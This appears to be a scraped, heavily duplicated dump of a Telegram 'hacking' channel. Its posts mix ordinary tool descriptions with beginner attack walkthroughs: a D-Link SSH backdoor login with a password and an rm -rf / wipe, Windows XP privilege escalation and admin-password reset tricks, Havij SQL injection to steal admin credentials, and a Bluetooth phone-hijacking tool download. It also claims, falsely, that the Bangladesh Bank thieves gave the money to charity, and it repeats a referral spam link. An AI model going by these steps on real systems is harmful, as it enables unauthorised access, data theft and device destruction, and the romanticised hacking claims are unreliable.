1.Metasploit
Metasploit is available for all major platforms including Windows, Linux, and OS X. Rather than calling Metasploit a collection of exploit tools, I’ll call it an infrastructure that you can utilize to build your custom tools. This free tool is one of the most popular cyber security tools around that allows you to locate vulnerabilities at different platforms. Metasploit is backed by more than 200,000 users and contributors that help you to get insights and uncover the weaknesses in your system.
This tool package lets you simulate real-world attacks to tell you about the weak points and finds them. As a penetration tester, it pinpoints the vulnerabilities with Nexpose closed-loop integration using Top Remediation reports. Using the open-source Metasploit framework, users can build their tools and take the best out of this multi-purpose hacking tool.
2. NMap
Nmap is available for all major platforms including Windows, Linux, and OS X. I think everyone has heard of this one, Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to Nmap rapidly scan large networks, although it works fine against single hosts. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a “map” of the network. Nmap runs on most types of computers, and both console and graphical versions are available. Nmap is a fee and open source tool that can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.
3. Acunetix WVS
Acunetix is available for Windows XP and higher. Acunetix is a web vulnerability scanner (WVS) that scans and finds out the flaws in a website that could prove fatal. This multi-threaded tool crawls a website and finds out malicious Cross-site Scripting, SQL injection, and other vulnerabilities. This fast and easy to use tool scans WordPress websites from more than 1200 vulnerabilities in WordPress.
Acunetix comes with a Login Sequence Recorder that allows one to access the password protected areas of web sites. The new AcuSensor technology used in this tool allows you to reduce the false positive rate. Such features have made Acunetix WVS a preferred hacking tools that you need to check out in 2018.
4.Wire Shark
This free and open source tool was originally named Ethereal. Wireshark also comes in a command-line version called TShark. This GTK+-based network protocol analyzer runs with ease on Linux, Windows, and OS X. Wireshark is a GTK+-based Wireshark network protocol analyzer or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams.
5.OCLHashcat
This useful hacking tool can be downloaded in different versions for Linux, OSX, and Windows. If password cracking is something you do on a daily basis, you might be aware of the free password cracking tool Hashcat. While Hashcat is a CPU-based password cracking tool, oclHashcat is its advanced version that uses the power of your GPU.
oclHashcat calls itself world’s fastest password cracking tool with world’s first and only GPGPU based engine. For using the tool, NVIDIA users require ForceWare 346.59 or later, and AMD users require Catalyst 15.7 or later.
This tool employs following attack modes for cracking:
Straight
Combination
Brute-force
Hybrid Dictionary + mask
Hybri
Metasploit is available for all major platforms including Windows, Linux, and OS X. Rather than calling Metasploit a collection of exploit tools, I’ll call it an infrastructure that you can utilize to build your custom tools. This free tool is one of the most popular cyber security tools around that allows you to locate vulnerabilities at different platforms. Metasploit is backed by more than 200,000 users and contributors that help you to get insights and uncover the weaknesses in your system.
This tool package lets you simulate real-world attacks to tell you about the weak points and finds them. As a penetration tester, it pinpoints the vulnerabilities with Nexpose closed-loop integration using Top Remediation reports. Using the open-source Metasploit framework, users can build their tools and take the best out of this multi-purpose hacking tool.
2. NMap
Nmap is available for all major platforms including Windows, Linux, and OS X. I think everyone has heard of this one, Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to Nmap rapidly scan large networks, although it works fine against single hosts. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a “map” of the network. Nmap runs on most types of computers, and both console and graphical versions are available. Nmap is a fee and open source tool that can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.
3. Acunetix WVS
Acunetix is available for Windows XP and higher. Acunetix is a web vulnerability scanner (WVS) that scans and finds out the flaws in a website that could prove fatal. This multi-threaded tool crawls a website and finds out malicious Cross-site Scripting, SQL injection, and other vulnerabilities. This fast and easy to use tool scans WordPress websites from more than 1200 vulnerabilities in WordPress.
Acunetix comes with a Login Sequence Recorder that allows one to access the password protected areas of web sites. The new AcuSensor technology used in this tool allows you to reduce the false positive rate. Such features have made Acunetix WVS a preferred hacking tools that you need to check out in 2018.
4.Wire Shark
This free and open source tool was originally named Ethereal. Wireshark also comes in a command-line version called TShark. This GTK+-based network protocol analyzer runs with ease on Linux, Windows, and OS X. Wireshark is a GTK+-based Wireshark network protocol analyzer or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams.
5.OCLHashcat
This useful hacking tool can be downloaded in different versions for Linux, OSX, and Windows. If password cracking is something you do on a daily basis, you might be aware of the free password cracking tool Hashcat. While Hashcat is a CPU-based password cracking tool, oclHashcat is its advanced version that uses the power of your GPU.
oclHashcat calls itself world’s fastest password cracking tool with world’s first and only GPGPU based engine. For using the tool, NVIDIA users require ForceWare 346.59 or later, and AMD users require Catalyst 15.7 or later.
This tool employs following attack modes for cracking:
Straight
Combination
Brute-force
Hybrid Dictionary + mask
Hybri
HACK OR DIE
how to hack a d-link modem
open a terminal on your linux machine [it doesnt work on windows]
mostly the ip of the router is
192.168.1.1 or 192.168.0.1
so pick one and lets begin
now type
ssh remotessh@192.168.1.1
type the backdoor password which is 5SaP9I26
congratulations!
an ssh shell will open
now you have root access on the modem
you can choose to format it by typing
rm -rf /
or restart it
shutdown -r -t1
or change the password
passwd -u root
whatever you do, just make sure u hv fun
~halo zorayo
Join us for more Hacking Tutorials @TechByte
how to hack a d-link modem
open a terminal on your linux machine [it doesnt work on windows]
mostly the ip of the router is
192.168.1.1 or 192.168.0.1
so pick one and lets begin
now type
ssh remotessh@192.168.1.1
type the backdoor password which is 5SaP9I26
congratulations!
an ssh shell will open
now you have root access on the modem
you can choose to format it by typing
rm -rf /
or restart it
shutdown -r -t1
or change the password
passwd -u root
whatever you do, just make sure u hv fun
~halo zorayo
Join us for more Hacking Tutorials @TechByte
If any pro/expert hacker reading it then you can skip on..
.
GUYS WE ARE TEACHING YOU ALL ETHCIAL HACKING/WHITE HAT HACKING IN SIMPLE AND EASY MANNER. SO WHY Do you all Waste time by Inboxing Scammers & frauds.
.
/ #CRYPTOGRAPHY .\
Mates; hope you are fine. Today we are going to discuss about cryptography, we have used this term lot in previous lessons, So now lets understand what is cryptography meant by. cryptography is about constructing and analyzing protocols that prevent third parties or the public from reading private messages, cryptography is a method for encryption of data, example you may heard about whatsapp end-to-end encryption, that means if you send Message to a person then only that person only can read it no other third party access in between you and your friend. Or else in simple words cryptography is method of converting readable text in computer language. So that computer can only read it, no other persons.
So friends this was a simple topic
.
.
.
B-) B-) We need More support B-) B-) Can you help us ? We are thinking to Share you much things. And we are expecting you all to share your friends and Increase Our Support. :-
Inbox us @anonyguy , @roml3n
Join us @TechByte
.
GUYS WE ARE TEACHING YOU ALL ETHCIAL HACKING/WHITE HAT HACKING IN SIMPLE AND EASY MANNER. SO WHY Do you all Waste time by Inboxing Scammers & frauds.
.
/ #CRYPTOGRAPHY .\
Mates; hope you are fine. Today we are going to discuss about cryptography, we have used this term lot in previous lessons, So now lets understand what is cryptography meant by. cryptography is about constructing and analyzing protocols that prevent third parties or the public from reading private messages, cryptography is a method for encryption of data, example you may heard about whatsapp end-to-end encryption, that means if you send Message to a person then only that person only can read it no other third party access in between you and your friend. Or else in simple words cryptography is method of converting readable text in computer language. So that computer can only read it, no other persons.
So friends this was a simple topic
.
.
.
B-) B-) We need More support B-) B-) Can you help us ? We are thinking to Share you much things. And we are expecting you all to share your friends and Increase Our Support. :-
Inbox us @anonyguy , @roml3n
Join us @TechByte
BOOK REVIEW
Hacking: The Art Of Exploitation
this is a book that i think is the final step to being a hacker
the difference between an intermediate hacker and an elite hacker is the fact that the elite hacker can write exploits while the other just understands the concepts
simply put
elite hacker = intermediate hacker + programmer/ coder
this book teaches how to make your own keyloggers, sniffers and password crackers
once you master this book, feel free to call yourself an elite hacker
feel free to browse the files section of the group to find and read it
looking forward to project halo
~halo Zorayo
Hacking: The Art Of Exploitation
this is a book that i think is the final step to being a hacker
the difference between an intermediate hacker and an elite hacker is the fact that the elite hacker can write exploits while the other just understands the concepts
simply put
elite hacker = intermediate hacker + programmer/ coder
this book teaches how to make your own keyloggers, sniffers and password crackers
once you master this book, feel free to call yourself an elite hacker
feel free to browse the files section of the group to find and read it
looking forward to project halo
~halo Zorayo
SKIDS CORNER
HOW TO BECOME ADMIN OF WIN XP
privilege escalation exploit
1. open cmd
note the current time on the pc and add one minute to it.
in my case my time is 9:54 so i make it 9:55
2. now type
at 9:55 cmd.exe /interactive
3. wait for a minute, a new cmd shell will open. go to this shell and type
taskkill /im explorer.exe
and your files will disappear.
4.now type
explorer.exe
your files will reappear
but check the account name on top of the start menu, it will be something like
SYSTEM/
congratulations, u are root!
this is a skids tutorial on how to get root/admin access on win xp
enjoy!
~halo Zorayo
HOW TO BECOME ADMIN OF WIN XP
privilege escalation exploit
1. open cmd
note the current time on the pc and add one minute to it.
in my case my time is 9:54 so i make it 9:55
2. now type
at 9:55 cmd.exe /interactive
3. wait for a minute, a new cmd shell will open. go to this shell and type
taskkill /im explorer.exe
and your files will disappear.
4.now type
explorer.exe
your files will reappear
but check the account name on top of the start menu, it will be something like
SYSTEM/
congratulations, u are root!
this is a skids tutorial on how to get root/admin access on win xp
enjoy!
~halo Zorayo
LINUX COMMANDS
pwd
pwd is a linux command that stands for current working directory
when you type this in a shell, you will see the current folder you have opened.
eg. root@kali> pwd
/bin
this means we are in the bin folder
ls
this one stands for list
it simply lists all the files and folders in the folder that you have opened
to see them just type ls
eg. root@kali> ls
bin var etc
this means there are three folders in our current folder
bin etc and var
but this does not show your hidden files [like the folder where you keep ur sensitive documents or porn]
;)
to see all files including hidden files add -al
eg. root@kali> ls -al
bin var etc porn
now u can see that the hidden porn folder has been added. busted!
cd
cd stands for change directory [thats another name for folder]
examples
root@kali> pwd
/root
so we r in a folder called root
> ls
var etc
there are two folders in root
>cd etc
now we change our folder to etc
>pwd
/root/etc
so now our folder is etc
stay tuned!
Questions? @anonyguy
pwd
pwd is a linux command that stands for current working directory
when you type this in a shell, you will see the current folder you have opened.
eg. root@kali> pwd
/bin
this means we are in the bin folder
ls
this one stands for list
it simply lists all the files and folders in the folder that you have opened
to see them just type ls
eg. root@kali> ls
bin var etc
this means there are three folders in our current folder
bin etc and var
but this does not show your hidden files [like the folder where you keep ur sensitive documents or porn]
;)
to see all files including hidden files add -al
eg. root@kali> ls -al
bin var etc porn
now u can see that the hidden porn folder has been added. busted!
cd
cd stands for change directory [thats another name for folder]
examples
root@kali> pwd
/root
so we r in a folder called root
> ls
var etc
there are two folders in root
>cd etc
now we change our folder to etc
>pwd
/root/etc
so now our folder is etc
stay tuned!
Questions? @anonyguy
some of questions you guys ask me in private chat are really very...
when you ask anything about coding or hacking, please ask realistic questions that will help your life.
please don ask unrealistic questions that have nothing to do with this group
examples
how to turn of someones phone by sending a whatsapp message
how to use c programming to code a table
how to hack an electric light pole with cmd
how to use python to turn a fridge into a microwave
please these questions will not give you any knowledge about coding or hacking.
people will just laugh at you
if you want to learn python or cmd then do so
then start hacking your light poles to see if that is possible.
~halo zorayo
@anonyguy
when you ask anything about coding or hacking, please ask realistic questions that will help your life.
please don ask unrealistic questions that have nothing to do with this group
examples
how to turn of someones phone by sending a whatsapp message
how to use c programming to code a table
how to hack an electric light pole with cmd
how to use python to turn a fridge into a microwave
please these questions will not give you any knowledge about coding or hacking.
people will just laugh at you
if you want to learn python or cmd then do so
then start hacking your light poles to see if that is possible.
~halo zorayo
@anonyguy
Stopping Redirection From google.com to google.co.in (Stopping Location based google)September 9, 2014
BY CYBERINTRUDER
Step1: Open the browser , type http://www.google.com/ncr
NCR stands for “No Country Redirect”
Now you can browse normally . you can see only http://www.google.com , it won’t redirect to location based google like http://www.google.co.in
BY CYBERINTRUDER
Step1: Open the browser , type http://www.google.com/ncr
NCR stands for “No Country Redirect”
Now you can browse normally . you can see only http://www.google.com , it won’t redirect to location based google like http://www.google.co.in
__NOT FOR THE MONEY
__
one reason some of you have still not evolved to become hackers is that you think about how you will use your skills to hack banks and get quick money
forget money
when you start hacking, money will come on its own
one thing about hackers is that we are generous
we don think about being rich
we know the problems in our society and we use our skills to call the attention of the government to do something about it
such people are called hacktivists
this is why i don want you to classify people as blackhats
they do all those things to get the government to solve the problems in the country
the fact that they don approve of the way we do it doesnt make us blackhats [bad people]
in 2016, the bank of bangladesh was hacked. millions of dollars stolen. what did the hackers do with the money?
did they become rich? no
they donated [most] of the money to orphanages and charity organisations like people who needed heart surgery
its never about the money
its about helping the people around you
~halo zorayo
__
one reason some of you have still not evolved to become hackers is that you think about how you will use your skills to hack banks and get quick money
forget money
when you start hacking, money will come on its own
one thing about hackers is that we are generous
we don think about being rich
we know the problems in our society and we use our skills to call the attention of the government to do something about it
such people are called hacktivists
this is why i don want you to classify people as blackhats
they do all those things to get the government to solve the problems in the country
the fact that they don approve of the way we do it doesnt make us blackhats [bad people]
in 2016, the bank of bangladesh was hacked. millions of dollars stolen. what did the hackers do with the money?
did they become rich? no
they donated [most] of the money to orphanages and charity organisations like people who needed heart surgery
its never about the money
its about helping the people around you
~halo zorayo
Hello friends
I found a way to answer
People who have modems and their modem Internet volume will be done
1. First, install the vip pro proxy or vpn pro, then connect to the modem that is full.
2-Then enter the More options or settings
Next, add this proxy to 185.143.233.210 on a vip or proxy with 80 or 8080 ports.
4. Then press the Connect button
5. If the filter is connected then the modem volume is hacked
I found a way to answer
People who have modems and their modem Internet volume will be done
1. First, install the vip pro proxy or vpn pro, then connect to the modem that is full.
2-Then enter the More options or settings
Next, add this proxy to 185.143.233.210 on a vip or proxy with 80 or 8080 ports.
4. Then press the Connect button
5. If the filter is connected then the modem volume is hacked
Just Hack That Website, By Using ;) (Havji)
-------------------------------------------------------------------------------------------------------
.
Note: Only For n00b Purpose.>!!! :D
.
Just Follow these easy steps :-
.
1. First download havij from here
https://itsecteam. com/
.
2. Run Havij SQL Injection software and copy and paste
vulnerable website link
.
3. Now click in the “Analyze” Button
.
4. Then It shows some messages there. Be alert on it and be show patience for sometime to find it’s vulnerable and type of injection and if db server is mysql and it will find database name. Then after getting it’s database name like xxxx_xxxx
.
5. Then Move to another operation to find tables by clicking “tables” as there will be a figure shown to you in order to do so. Now click “Get tables”
Then wait some time if needed
.
6. After founded the tables, you can see there will be “users” Put mark on it and click in the ” get columns ” tab
.
7. In that Just put mark username and password and click “Get data”
.
8. Finally you've now got username and password of the admin…
.
Have your n00b day :D
.
#Have Your Old Fun Times ♥♥
@TechByte
-------------------------------------------------------------------------------------------------------
.
Note: Only For n00b Purpose.>!!! :D
.
Just Follow these easy steps :-
.
1. First download havij from here
https://itsecteam. com/
.
2. Run Havij SQL Injection software and copy and paste
vulnerable website link
.
3. Now click in the “Analyze” Button
.
4. Then It shows some messages there. Be alert on it and be show patience for sometime to find it’s vulnerable and type of injection and if db server is mysql and it will find database name. Then after getting it’s database name like xxxx_xxxx
.
5. Then Move to another operation to find tables by clicking “tables” as there will be a figure shown to you in order to do so. Now click “Get tables”
Then wait some time if needed
.
6. After founded the tables, you can see there will be “users” Put mark on it and click in the ” get columns ” tab
.
7. In that Just put mark username and password and click “Get data”
.
8. Finally you've now got username and password of the admin…
.
Have your n00b day :D
.
#Have Your Old Fun Times ♥♥
@TechByte
Just hack That Ugly Mobile, By Using Bluetooth:-
---------------------------------------------------------------------------------------------------------------------------------------
.
Note : Only For old Tea Purpose.>!!!!!
.
Bluetooth hack 2009 is gonna do the job for you ;)
Super Bluetooth hack 2009 is one of the most downloaded Bluetooth
hacking tools. Super bluetooth hack 2009 is used for mobile based Symbian operating system to hack & manage any mobile near you, which is vulnerable to Bluetooth-hacking attack.
.
Download This Bluetooth hack: - https:// www. mobicreed. com/wpcontent/
uploads/2009/05/ftp_btmobicreedcom. rar (No spaces, please)
.
Procedure To Install Super Bluetooth Hack 2009
.
1) Download to PC
.
2) Transfer it to your Bluetooth enabled mobile.
.
3) Run the Installer (Remember, You must have Java enabled phone for installing it) ;)
.
4) Finds it and you will be able to run program
.
5) Select the language and configure it.
.
6) Click > Connection
.
7) Click > Search Devices
.
8) Choose the “Victim”
.
9) And start managing with following hacks mentioned with Bluetooth.
.
#Have Your n00b day !!!
.
#Old Tea Moments.
---------------------------------------------------------------------------------------------------------------------------------------
.
Note : Only For old Tea Purpose.>!!!!!
.
Bluetooth hack 2009 is gonna do the job for you ;)
Super Bluetooth hack 2009 is one of the most downloaded Bluetooth
hacking tools. Super bluetooth hack 2009 is used for mobile based Symbian operating system to hack & manage any mobile near you, which is vulnerable to Bluetooth-hacking attack.
.
Download This Bluetooth hack: - https:// www. mobicreed. com/wpcontent/
uploads/2009/05/ftp_btmobicreedcom. rar (No spaces, please)
.
Procedure To Install Super Bluetooth Hack 2009
.
1) Download to PC
.
2) Transfer it to your Bluetooth enabled mobile.
.
3) Run the Installer (Remember, You must have Java enabled phone for installing it) ;)
.
4) Finds it and you will be able to run program
.
5) Select the language and configure it.
.
6) Click > Connection
.
7) Click > Search Devices
.
8) Choose the “Victim”
.
9) And start managing with following hacks mentioned with Bluetooth.
.
#Have Your n00b day !!!
.
#Old Tea Moments.
Forwarded from RL channels
Earn money online by completing a few short surveys. Withdraw when you get $20 to your PayPal or as Air Miles.
Use the link below to get $1 upon sign-up.
https://legerweb.com/1VPCRA
Use the link below to get $1 upon sign-up.
https://legerweb.com/1VPCRA
#INCLUDE<TYPES.H>
some of you guys contact me on how to hack apps
i am not a reverse engineer
there are many types of hackers but what we do here is called penetration testing
the main types of hacking are
cryptologists break encryption protocols
pentesters infiltrate remote servers and retrieve files
forensics are concerned with the recovery of data and how computer crimes take place
binary exploiters use buffer overflows and heap spraying to execute code and gain acess to servers [this is different from how pentesters do it]
reverse engineers hack hardware and software
they hack games and create crack software
reverse engineers are very dangerous
for example they can use sound waves to hack your pc etc.
social engineers hack the human mind
instead of these hackers to sit behind a computer, they trick people into giving their passwords
this is where phishiing comes from
phreakers get free internet and calls
this is where ss7 comes from
now you can choose what type of hacker you want to be
~halo
some of you guys contact me on how to hack apps
i am not a reverse engineer
there are many types of hackers but what we do here is called penetration testing
the main types of hacking are
cryptologists break encryption protocols
pentesters infiltrate remote servers and retrieve files
forensics are concerned with the recovery of data and how computer crimes take place
binary exploiters use buffer overflows and heap spraying to execute code and gain acess to servers [this is different from how pentesters do it]
reverse engineers hack hardware and software
they hack games and create crack software
reverse engineers are very dangerous
for example they can use sound waves to hack your pc etc.
social engineers hack the human mind
instead of these hackers to sit behind a computer, they trick people into giving their passwords
this is where phishiing comes from
phreakers get free internet and calls
this is where ss7 comes from
now you can choose what type of hacker you want to be
~halo
how can upgrade ur phone version, from 5.1 to ... 1. OTA ( over the air update). If you are using google products like nexus, you can update everytime new version pops up. Other manufacturers, provide upto 2 latest updates.
Go to system>about phone> updates
2. If your system manufacturer isn't providing new updates anymore, you can check the custom roms, for your device.
3. If you can't find any custom roms too, you can create your rom for your device using the google opensource code.
Note: Sometimes its better to leave the device as it is, and get a new device altogether.
Go to system>about phone> updates
2. If your system manufacturer isn't providing new updates anymore, you can check the custom roms, for your device.
3. If you can't find any custom roms too, you can create your rom for your device using the google opensource code.
Note: Sometimes its better to leave the device as it is, and get a new device altogether.
how to hack admin password using guest account💻
👉open cmd
✍ :cd\windows\system32(hit enter)
✍ mkdir newpass(hit enter)
✍ copy logon.scr newpass\logon.scr(hit enter)
✍ copy cmd.exe newpass\cmd.exe (hit enter)
✍ del logon.scr(hit enter)
✍ rename cmd.exe logon.scr (hit enter)
✍ net user administratorname password (hit enter)
@Techbyte
👉open cmd
✍ :cd\windows\system32(hit enter)
✍ mkdir newpass(hit enter)
✍ copy logon.scr newpass\logon.scr(hit enter)
✍ copy cmd.exe newpass\cmd.exe (hit enter)
✍ del logon.scr(hit enter)
✍ rename cmd.exe logon.scr (hit enter)
✍ net user administratorname password (hit enter)
@Techbyte
Beware of Shopping Scams on the Web
I have been seeing Hacking: The Art of Exploitation, 2nd Edition Book(with free shippin to Ethiopia) on the Web. I recently encountered three different vendors on Amazon and Yahoo Shopping who wanted me to pay for items using Western Union or Moneygram. The Web vendors appeared to be legitimate US businesses but it turns out they wanted the cash payment sent to an international address.
The Amazon Marketplace and Yahoo Shopping do have certain guarantees for consumers but only if you pay using their credit card method.
I know no one reading this would succumb to a scam like this but if you have a friend or relative who isn't Web/ business savvy you might want to remind them to only pay for items using a credit card and make sure the vendor is legit. I also try to make sure I also have a valid business phone number and address before buying an item on the Web. Never send cash, especially to an international address.
Note-this Channel i can say is one of the best groups for learning hacking on Telegram
if you are new, read the older posts before asking me new questions. most of your questions have already been explained if its new ask me @anonyguy
I have been seeing Hacking: The Art of Exploitation, 2nd Edition Book(with free shippin to Ethiopia) on the Web. I recently encountered three different vendors on Amazon and Yahoo Shopping who wanted me to pay for items using Western Union or Moneygram. The Web vendors appeared to be legitimate US businesses but it turns out they wanted the cash payment sent to an international address.
The Amazon Marketplace and Yahoo Shopping do have certain guarantees for consumers but only if you pay using their credit card method.
I know no one reading this would succumb to a scam like this but if you have a friend or relative who isn't Web/ business savvy you might want to remind them to only pay for items using a credit card and make sure the vendor is legit. I also try to make sure I also have a valid business phone number and address before buying an item on the Web. Never send cash, especially to an international address.
Note-this Channel i can say is one of the best groups for learning hacking on Telegram
if you are new, read the older posts before asking me new questions. most of your questions have already been explained if its new ask me @anonyguy
Forwarded from RL channels
Earn money online by completing a few short surveys. Withdraw when you get $20 to your PayPal or as Air Miles.
Use the link below to get $1 upon sign-up.
https://legerweb.com/1VPCRA
Use the link below to get $1 upon sign-up.
https://legerweb.com/1VPCRA
Exploit Title: XSS Vuln - TP-LINK TL-WR740N Exploit Author: bl00dy# Tested on: Windows 8.1
Cross-site scripting (XSS) in TP-LINK TL-WR740N
__________________________________________________
Proof of Concept:
1. Go to your wireless router ip (ex. 192.168.0.1)
2. Go to Wireless and -Wireless MAC Filtering- tab
3. Click Add new button
5.Write random MAC Address and in -Description- write (<h1>XSS by
bl00dy</h1>)
6.Click save and you will see XSS in Wireless MAC Filtering tab
Cross-site scripting (XSS) in TP-LINK TL-WR740N
__________________________________________________
Proof of Concept:
1. Go to your wireless router ip (ex. 192.168.0.1)
2. Go to Wireless and -Wireless MAC Filtering- tab
3. Click Add new button
5.Write random MAC Address and in -Description- write (<h1>XSS by
bl00dy</h1>)
6.Click save and you will see XSS in Wireless MAC Filtering tab
How to Log in xp without password
1.start computer
2.when it asks for password press ctrl+ alt + delete key twice
3.now another window opens asking for password.....
4. In this at the place of user name just type administrator...leave the password feild blank and hit enter
1.start computer
2.when it asks for password press ctrl+ alt + delete key twice
3.now another window opens asking for password.....
4. In this at the place of user name just type administrator...leave the password feild blank and hit enter